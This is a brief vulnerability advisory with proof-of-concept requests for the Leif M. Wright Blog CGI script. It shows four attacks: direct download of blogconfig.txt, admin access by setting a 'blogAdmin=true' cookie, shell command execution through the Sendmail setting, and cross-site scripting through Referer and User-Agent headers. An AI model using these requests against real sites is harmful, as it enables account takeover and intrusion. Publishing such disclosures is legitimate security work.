PoC/Exploit for Multiple flaws in Leif M. Wright Blog

Published Proof of Concept code - Multiple flaws in Leif M. Wright Blog.

Description
Available
Solution
Not available - check vendor's website

1. Sensitive Information Disclosure and Authentication Bypass

Url example:

http://[host]/cgi-bin/blog/blogconfig.txt

2. Cookie Authentication Bypass

Cookie: blogAdmin=true

3. Shell Command Execution

Sendmail: /bin/ls

4. 'Referer' and 'User-Agent' Cross-Site Scripting


GET /cgi-bin/blog/blog.cgi HTTP/1.0
Host: [host]
Referer: [XSS]
User-Agent: [XSS]
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

file=15-13.59.39.txt&year=2006&month=February&name=zz&comment=zzz&submit=Enter%20my%20comment

Order Source Code Audit made by eVuln

Defend against hacker attacks by PHP code analysis of your site done by our team.The work will be done by experts in website security.

Advisories by vuln type